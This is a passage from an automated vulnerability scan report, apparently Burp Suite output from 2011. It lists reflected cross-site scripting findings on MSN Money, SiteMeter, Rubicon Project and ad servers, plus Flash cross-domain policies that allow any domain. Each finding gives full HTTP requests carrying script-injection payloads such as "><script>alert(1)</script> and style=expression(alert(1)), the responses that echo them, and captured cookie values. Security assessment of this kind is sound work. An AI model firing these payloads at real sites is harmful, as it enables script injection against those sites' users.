Date: Sun, 30 Jan 2011 02:15:43 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted//?edfff"><script>alert(1)</script>c74f635b791=1
Content-Length: 100

object moved <a href="http://money.msn.com//?edfff"><script>alert(1)</script>c74f635b791=1">here</a>

5.357. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4755d"><script>alert(1)</script>10ee24922f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /investor/home.aspx?4755d"><script>alert(1)</script>10ee24922f0=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 29 Jan 2011 23:48:18 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing?4755d"><script>alert(1)</script>10ee24922f0=1
Content-Length: 108

object moved <a href="http://money.msn.com/investing?4755d"><script>alert(1)</script>10ee24922f0=1">here</a>

5.358. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://moneycentral.msn.com
Path:	/investor/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec77d"style%3d"x%3aexpression(alert(1))"dc5f63f4feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ec77d"style="x:expression(alert(1))"dc5f63f4feb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /investor/home.aspx?ec77d"style%3d"x%3aexpression(alert(1))"dc5f63f4feb=1 HTTP/1.1
Host: redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 18:03:22 GMT
Server: Microsoft-IIS/6.0
Location: http://money.redacted/investing?ec77d"style="x:expression(alert(1))"dc5f63f4feb=1
Content-Length: 112

object moved <a href="http://money.msn.com/investing?ec77d"style="x:expression(alert(1))"dc5f63f4feb=1">here</a>

5.359. http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7665/13236/25159-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc63c"-alert(1)-"cbcff432d44 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7665/13236/25159-2.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="28 Jan 2011 14:48:45 GMT"; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_1185=3011330574290390485; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; put_2100=usr3fd748acf5bcab14; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3297869551067506954; khaos=GIPAEQ2D-C-IOYY; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; ruid=fc63c"-alert(1)-"cbcff432d44; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; put_1986=4760492999213801733; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:17:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7665/13236; expires=Sun, 30-Jan-2011 03:17:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 30-Jan-2011 03:17:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=7531^1&13236^2; expires=Mon, 31-Jan-2011 05:59:59 GMT; max-age=106942; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3189870.js^1^1296353857^1296353857&3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; expires=Sun, 06-Feb-2011 02:17:37 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2102

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3189870"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=fc63c"-alert(1)-"cbcff432d44\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

5.360. http://s18.sitemeter.com/js/counter.asp [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s18.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db31b"%3balert(1)//e45c3d069cd was submitted in the IP cookie. This input was echoed as db31b";alert(1)//e45c3d069cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.asp HTTP/1.1
Host: s18.sitemeter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: IP=173%2E193%2E214%2E243db31b"%3balert(1)//e45c3d069cd;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7206
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 02:28:56 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243db31b";alert(1)//e45c3d069cd";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

5.361. http://s18.sitemeter.com/js/counter.js [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s18.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9ea8"%3balert(1)//3ef96a62d10 was submitted in the IP cookie. This input was echoed as c9ea8";alert(1)//3ef96a62d10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.js HTTP/1.1
Host: s18.sitemeter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: IP=173%2E193%2E214%2E243c9ea8"%3balert(1)//3ef96a62d10;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:18:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7206
Content-Type: application/x-javascript
Expires: Sun, 30 Jan 2011 02:28:57 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243c9ea8";alert(1)//3ef96a62d10";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

5.362. http://redcated/PTR/jview/240321567/direct [AA002 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://redcated
Path:	/PTR/jview/240321567/direct

Issue detail

The value of the AA002 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f364'-alert(1)-'aa543a3cef9 was submitted in the AA002 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PTR/jview/240321567/direct;wi.1;hi.1/01?relocate=http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-37866079f364'-alert(1)-'aa543a3cef9; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 420
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:41 GMT

document.writeln('<scr' + 'ipt src="' + 'http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link' + '/ATCI=' + '1294100002-37866079f364'-alert(1)-'aa543a3cef9' + '">
...[SNIP]...

6. Flash cross-domain policy previous next
There are 105 instances of this issue:

http://ad.ae.doubleclick.net/crossdomain.xml
http://ajax.googleapis.com/crossdomain.xml
http://ak.c.ooyala.com/crossdomain.xml
http://amch.questionmarket.com/crossdomain.xml
http://ar.voicefive.com/crossdomain.xml
http://atl.whitepages.com/crossdomain.xml
http://b.rad.redacted/crossdomain.xml
http://b.voicefive.com/crossdomain.xml
http://b3.mookie1.com/crossdomain.xml
http://beta-ads.ace.advertising.com/crossdomain.xml
http://blstj.redacted/crossdomain.xml
http://college.scout.com/crossdomain.xml
http://collegebasketball.scout.com/crossdomain.xml
http://collegefootball.scout.com/crossdomain.xml
http://colstc.redacted/crossdomain.xml
http://colstj.redacted/crossdomain.xml
http://ec.redcated/crossdomain.xml
http://edge1.catalog.video.redacted/crossdomain.xml
http://edge2.catalog.video.redacted/crossdomain.xml
http://edge3.catalog.video.redacted/crossdomain.xml
http://edge4.catalog.video.redacted/crossdomain.xml
http://edge5.catalog.video.redacted/crossdomain.xml
http://i4.ytimg.com/crossdomain.xml
http://jcfootball.scout.com/crossdomain.xml
http://mlb.scout.com/crossdomain.xml
http://p.ace.advertising.com/crossdomain.xml
http://preps.scout.com/crossdomain.xml
http://profootball.scout.com/crossdomain.xml
http://r1.ace.advertising.com/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://sas.ooyala.com/crossdomain.xml
https://secure.scout.com/crossdomain.xml
http://stj.redacted/crossdomain.xml
http://whitepg-images.adbureau.net/crossdomain.xml
http://wrapper.g.redacted/crossdomain.xml
http://www.morningstar.com/crossdomain.xml
http://www.scout.com/crossdomain.xml
http://www.terra.com/crossdomain.xml
http://www.webmd.com/crossdomain.xml
http://ad.wsod.com/crossdomain.xml
http://admedia.wsod.com/crossdomain.xml
http://alex-johnson.newsvine.com/crossdomain.xml
http://athima-chansanchai.newsvine.com/crossdomain.xml
http://bodyodd.msnbc.redacted/crossdomain.xml
http://boyle.newsvine.com/crossdomain.xml
http://cartoonblog.msnbc.redacted/crossdomain.xml
http://cdn.modules.ooyala.com/crossdomain.xml
http://dateline.msnbc.com/crossdomain.xml
http://hardball.msnbc.com/crossdomain.xml
http://helenaspopkin.newsvine.com/crossdomain.xml
http://info.ooyala.com/crossdomain.xml
http://ingame.msnbc.redacted/crossdomain.xml
http://ingame.newsvine.com/crossdomain.xml
http://jp.video.redacted/crossdomain.xml
http://l.player.ooyala.com/crossdomain.xml
http://latino.aol.com/crossdomain.xml
http://latino.video.redacted/crossdomain.xml
http://live.newsvine.com/crossdomain.xml
http://michaelwann.newsvine.com/crossdomain.xml
http://money.aol.com/crossdomain.xml
http://msnbc.com/crossdomain.xml
http://msnbcmedia.redacted/crossdomain.xml
http://mtp.msnbc.com/crossdomain.xml
http://music.aol.com/crossdomain.xml
http://nbcsports.msnbc.com/crossdomain.xml
http://netscape.aol.com/crossdomain.xml
http://news.discovery.com/crossdomain.xml
http://nightly.msnbc.com/crossdomain.xml
http://ninemsn.video.redacted/crossdomain.xml
http://openchannel.msnbc.redacted/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://photobucket.com/crossdomain.xml
http://player.ooyala.com/crossdomain.xml
http://rachel.msnbc.com/crossdomain.xml
http://redtape.newsvine.com/crossdomain.xml
http://static.ak.fbcdn.net/crossdomain.xml
http://suzanne-choney.newsvine.com/crossdomain.xml
http://technolog2.newsvine.com/crossdomain.xml
http://thelastword.msnbc.redacted/crossdomain.xml
http://today.msnbc.com/crossdomain.xml
http://toddkenreck.newsvine.com/crossdomain.xml
http://top.newsvine.com/crossdomain.xml
http://tv.msnbc.com/crossdomain.xml
http://wbenedetti.newsvine.com/crossdomain.xml
http://www.adobe.com/crossdomain.xml
http://www.amazon.com/crossdomain.xml
http://www.blackvoices.com/crossdomain.xml
http://www.dooce.com/crossdomain.xml
http://www.habitablezone.com/crossdomain.xml
http://www.hoovers.com/crossdomain.xml
http://www.msnbc.com/crossdomain.xml
https://www.newsvine.com/crossdomain.xml
http://www.polls.newsvine.com/crossdomain.xml
http://www.popularmechanics.com/crossdomain.xml
http://www.reuters.com/crossdomain.xml
http://www.signonsandiego.com/crossdomain.xml
http://www.tigerdirect.com/crossdomain.xml
http://www.walmart.com/crossdomain.xml
http://www.zacks.com/crossdomain.xml
http://advertising.redacted/crossdomain.xml
http://articles.redacted/crossdomain.xml
http://seedmagazine.com/crossdomain.xml
https://twitter.com/crossdomain.xml
http://www.livescience.com/crossdomain.xml
http://www.twitter.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

6.1. http://ad.ae.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.ae.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.ae.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 22 Oct 2008 17:22:35 GMT
Date: Sun, 30 Jan 2011 14:48:18 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.2. http://ajax.googleapis.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Sun, 30 Jan 2011 13:15:44 GMT
Date: Sat, 29 Jan 2011 13:15:44 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 44616

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.3. http://ak.c.ooyala.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ak.c.ooyala.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: ak.c.ooyala.com
Proxy-Connection: keep-alive
Referer: http://ak.c.ooyala.com/cacheable/8f10eff3e29de0efc37c5b898c718a48/player_v2.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
x-amz-id-2: wpK4wcLXOVar2wzl8i2KDRsRUb/FDGbkmhSofLdqHUeOScSp9vxoM5FhXzpTep7i
x-amz-request-id: 756D4F260FA6AE9C
Last-Modified: Mon, 12 Jan 2009 21:58:46 GMT
ETag: "124fa42a56284acbe74862f0024af4f3"
Content-Type: text/x-cross-domain-policy
Content-Length: 157
Server: AmazonS3
Cache-Control: max-age=604800
Date: Sun, 30 Jan 2011 12:49:00 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.4. http://amch.questionmarket.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:43:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "2005439f-d1-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 209
Keep-Alive: timeout=120, max=218
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

6.5. http://ar.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 30 Jan 2011 01:40:19 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.6. http://atl.whitepages.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://atl.whitepages.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: atl.whitepages.com

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.8.1 (Red Hat Linux Enterprise 4; X86)
Date: Sun, 30 Jan 2011 01:40:27 GMT
X-DirectServer: whitepg_DS4
Content-Type: text/xml
Content-Length: 95
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" secure="true"/>
</cross-domain-policy>

6.7. http://b.rad.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.rad.redacted
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.rad.redacted

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/xml
Last-Modified: Fri, 21 Jan 2011 01:07:24 GMT
Accept-Ranges: bytes
ETag: "02ee18f7b9cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:40:48 GMT
Connection: keep-alive
Content-Length: 202

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.8. http://b.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 31 Jan 2011 01:40:59 GMT
Date: Sun, 30 Jan 2011 01:40:59 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.9. http://b3.mookie1.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b3.mookie1.com

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:41:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Thu, 03 Jun 2010 03:38:56 GMT
ETag: "1ae5fe-d0-f2349400"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.10. http://beta-ads.ace.advertising.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://beta-ads.ace.advertising.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: beta-ads.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 02:06:03 GMT
Content-Type: text/xml
Content-Length: 81
Date: Sun, 30 Jan 2011 02:06:03 GMT
Connection: close
Set-Cookie: A07L=CT; expires=Sun, 27-Feb-2011 02:06:03 GMT; path=/; domain=beta-ads.ace.advertising.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.11. http://blstj.redacted/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blstj.redacted
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: blstj.redacted

Response

HTTP/1.0 200 OK
Cache-Control: max-age=31536000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "06e6dae977dc81:0",
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
S: BLUMPPSTCA01
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Content-Length: 224
Age: 6330306
Date: Sun, 30 Jan 2011 01:41:05 GMT
Last-Modified: Tue, 04 Mar 2008 01:33:00 GMT
